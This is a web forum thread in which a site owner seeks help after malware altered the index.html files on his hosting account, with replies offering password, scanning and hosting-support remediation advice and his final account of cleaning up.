Help there's a virus or hacker attacking my index.html files - has this happened to you?

Sounds like if it's affecting your sites on your hosting account it may be affecting others as well, have you contacted hostgator? They should be able to assist, start with them.

The other thing to always do in similar cases: change immediately all your passwords.
Better yet, check your computer for spyware/keyboard logger - maybe the hackers get the login info from your computer... and change the passwords AFTER the machine is cleaned.

Out of interest what sort of internet security are you using?

Thanks Charlie

And Duncan I use the paid version of Malwarebytes and Spyware Doctor, both with live detection enabled.

1. Change passwords immediately. More than likely, they have 'em.

2. Contact Hostgator suppore like yesterday so they know what's going on. Have them give you the access logs for your account for the last several days. This way, you might be able to figure out which IP's the attack is coming from, so you can block it.

Get off the forum, and do this NOW!

1. Scan your PC and eliminate spywares (hopefully you have a good anti spyware and will not need to format your computer)
2. Change your passwords

In addition to what others have said, disable Anonymous FTP, it's usually enabled by default. Then look at all your folders and look for unfamiliar files. Hackers often place a script deep in your site somewhere that you wouldn't readily notice it. You can delete things all day but if there is a hidden script it can keep changing it back. When my site was hacked I found a script buried in a CSS folder two or three levels deep.

Hi all

Thanks very much for the advice its appreciated. I've done everything that you have suggested. Changed cpanel password, scanned, contacted hostgator.

Dennis I'm not too sure how to disable 'anonomous FTP', is that on the Hostgator Panel or on my own ftp (smart ftp)?

In case it helps others, here is the reply from Hostgator too. Not sure there is anything further from what you guys have already told me, but at least they did get back to me very quickly.


The infection is consistent with many variant malware infections on user's PC's. Your cPanel password has been compromised and used to add this malicious content. Please change it immediately

Here is a list of steps that you can take to ensure your sites remain secure:

1. Use the following online vulnerability scanner and ensure your software is up-to-date: Scan Now - Online (OSI) - Vulnerability Scanning - Secunia.com
2. Download anti-virus and fully scan your PC for malicious files. Here are some free online scanners for Windows, which is typically the most vulnerable to infection. If you have a different OS, there are similar programs that can be located and run on your system to protect it in the same way:
MalwareBytes ( Malwarebytes.org ) and
ComboFix ( A guide and tutorial on using ComboFix ) have been reported to be able to clean a recent strain of malware that resists detection by almost all other anti-virus agents. It is highly suggested that you one or both of them and one of the following:
-http://housecall.trendmicro.com/
-http://www.bitdefender.com/scan8/ie.html
-http://www.kaspersky.com/virusscanner
-http://support.f-secure.com/enu/home/ols.shtml
-http://www.eset.com
3. Update all passwords for any account that you access/own that may not be up to standards. Any passwords that have been compromised will need to be changed as well. Standards for secure passwords are available: Password strength - Wikipedia, the free encyclopedia
4. Ensure that all scripts/plugins/modules/components are updated to the most recent released version, as new versions are released primarily to address known security vulnerabilities in these sites.
5. Keep your computer secure from malware infecting it. If your computer is compromised, your account can be compromised through your password being used to access it.
- Ensure you use the latest browser version; Ensure that said browser subscribes to Google's blacklist API (Mozilla Firefox, Google Chrome, Safari)
- Disable javascript
- Use the firefox addon noscript
- Make sure your antivirus has a subscription to new database and version releases. This may cost some amount of money, but is well worth the expense.
- Use AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone to test suspicious links you are given in emails or find online.
6. Ensure that all database configurations for your account are using a custom generated user and password combination, and that this information is not stored in plain text if this is feasible. Using your cPanel username and password to access your databases for your site may be convenient, but it introduces an incredible security risk.
7. Audit your account for unnecessary scripts, such as file uploaders. Ensure that if they are necessary that they are password protected, or if that is not feasible that they check the file type before allowing upload, to prevent upload of certain types of files.

Watch out that you don't get listed as a threatful site through Google search results. Once the problem is fixed, you can submit your site for review through the Google webmaster tools and eventually they'll remove the threat alert.

There's nothing worse than potential customers being driven away by stuff like that, it has happened to me before and it sucks!

Yes Ashley my sites were getting listed as threatful sites through Google! And yes it sucks!

May be helpul for others to know that the quick way to discover anything like this is to use Google Chrome to try to open your site. I say this because all the other browsers did not alert me, only Google Chrome did!

I'll go to webmaster tools and check if I need to resubmit. I hopefully fixed this in time so that Google may not have deindexed my sites...what was you experience?

Bobby

Boby

Exact same thing happened to me a few months back. Reasonably confident that is was malware on my PC that got hold of my FTP credentials.

Changing the passwords for every single host related function is essential but only useful if you've got rid of the cause.

They may well have installed a hidden script on your server as Dennis mentioned. If you've got a back-up that predates the infection by a week or so then I'd recommend wiping everything and starting afresh - I know that seems daunting but it may well be the quickest option you have.

Cleaning your PC may prove endless too. Malwarebytes is good, but didn't find the malware I had. A-squared is what eventually cleared it out.

If it's a blog that it's infected (quite common) then get yourself a copy of Craig Desorcy's Block Lockdown - some good info in that to help prevent future attacks.

Blog Lock Down: Secure Your Wordpress Blog Today (not aff link)

Good luck


Peter

Peter

Thanks for the tips.

You're right Malwarebytes in my experience is good, but it didn't find anything on my PC. Nor did Spyware Doctor. I'll have a look at A-Squared.

Frustrating though wondering if its still on my PC or on servers, and even though I've changed all passwords it could strike again!

Will let you know A-squared finds it.

Thanks again
Bobby

Bobby

A-Squared IS very good, but can throw up a lot of false positives - double check your results before wrecklessly hitting the delete button.

Peter

Yes good tip Peter its easy to assume that everything it finds is malicious. I check each file before taking action. Some are exe files so you're right is is worth checking first.

Fingers crossed my index.html problem appears to be away...but dont want to speak too soon!

I now have 3 different spyware and ant virus programmes running live at same time, appears to be no conflict. Computer is slightly slower, but after experiencing the hacked web files its a price worth paying.

Bobby

Thanks for this info Tony.

My Malwarebytes is now flagging up and blocking access to IP 94.228.209.171

Does anyone have any idea what site this is, I guess it could be a server which hosts malware sites??

Thanks
Bobby

Firts, scan the comuter for all viruses and Malware. Use Malwarebytes for it.
Then CHANGE FTP password. And give it to no one else.
Maybe someone else with FTP access has had that virus on computer (or still has) and it infected your html files.

You have to realize that if you are on a home network, and you are running ftp, then if any computer on the network is infected it can sniff out and steal your passwords. Even if your computer is clean but your wife's computer isn't then your wife's computer can be sniffing for passwords on the network. That's why I recommend using scp or sftp. It encrypts all the traffic so anyone on any network can't sniff your passwords.

Hi,
you must use a high security scanner to find the vulnerabilities you have done nothing wrong the software your using is just not as good as this one Website Security - Acunetix Web Security Scanner

Download and use that you will probably need to upload your file again after scanning
-WD

To everyone who gave me advice THANK YOU!

Here is the sequence I went through to get rid of it if it helps anyone else here.

1. Changed ftp password
2. Removed ftp password and only paste in to login box when using ftp
3. Ran 'A Squared', which found and deleted many trojans

At this point it was still infiltrating

4. Reinstalled my windows xp Op system (along with 58 updates!)

Problem now gone.

Again thanks to you all, this is a great forum.

Bobby

These hackers or virus's are getting smarter by the day even changing your pass word is worthwhile only for some time until they manage to do the same, I hope get this sorted good luck with thing.

Thanks Mili_D

Yes you're right, hope I've made it just a little harder for that to happen....

I have now removed my password completely from my FTP programme. Enter only when I use it and then remove it again.